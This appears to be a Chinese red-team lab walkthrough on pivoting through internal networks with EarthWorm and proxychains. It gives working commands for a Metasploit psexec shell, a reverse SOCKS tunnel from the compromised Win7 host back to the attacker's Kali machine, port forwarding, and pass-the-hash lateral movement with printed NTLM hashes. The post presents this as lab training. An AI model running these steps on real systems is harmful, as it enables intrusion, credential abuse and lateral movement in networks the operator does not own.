红队渗透系列-内网穿透之earthworm二层跳板机穿透及proxychains设置代理

声明:

所有演示都是在靶场环境下完成,仅限于网络安全技术交流,请遵守网络安全法

实际操作视频地址

https://www.bilibili.com/video/BV1SD4y1i7Ku/


靶场说明:

EW二级互联模式如示意图,kali与win7互通,win7和weblogic互通,win7与win2012web和其它内网主机不能直接互访,weblogic与内网其它主机可以互访

整体设置

1.weblogic 10.10.10.12上启动代理服务

weblogic上执行1 # ew_for_Win.exe -s ssocksd -l 1080

2.win7上执行,把来自外部 1090端口的流量转发到weblogic10.10.10.12的1080端口上

# ew_for_Win.exe -s lcx_tran -l 1090 -f 10.10.10.12 -g 1080 

3.kali设置proxychains socks192.168.1.4 1090,举例proxychains rdesktop 10.10.10.13

攻击步骤

1.利用msf通过psexec拿下win7 192.168.1.4的shell,上传ew.exe

2.设置反向代理

2.1kali上启动反向代理

./ew_for_linux -s rcsocks -l 1080 -e 1235 &

2.2 win7跳板机上执行反向链接kali的1235端口

meterpreter > execute -f "c:\windows\temp\ew.exe -s rssocks -d 192.168.1.5 -e 1235"

3.正向代理设置完成,设置proxychains工具,利用反向代理渗透weblogic,从win7上拿下hash,利用pth横向移动到weblogic

proxychains python wmiexec.py administrator@10.10.10.12 -hashes 41c3fc4a0f0950659a67bb2340a5f2dd:ccef208c6485269c20db2cad21734fe7 -codec gbk

4.在weblogic上上传ew.exe,并启动ew.exe,建立正向代理,监听1080端口

C:\windows\temp>ew.exe -s ssocksd -l 1080

5.在win7上执行ew命令,进行端口转发,把1090端口的流量转发到10.10.10.12的1080上

meterpreter > execute -f "c:\windows\temp\ew.exe -s lcx_tran -l 1090 -f 10.10.10.12 -g 1080"

6这样,完成一个正向代理,可以把最先建立的反向代理去掉了,可以利用正向代理访问内网资源了。

7.设置代理工具proxychains,代理ip是win7的ip地址192.168.1.4,代理端口是1090

8.远程访问10.10.10.13

proxychains rdesktop 10.10.10.13

最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
【社区内容提示】社区部分内容疑似由AI辅助生成,浏览时请结合常识与多方信息审慎甄别。
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

相关阅读更多精彩内容

友情链接更多精彩内容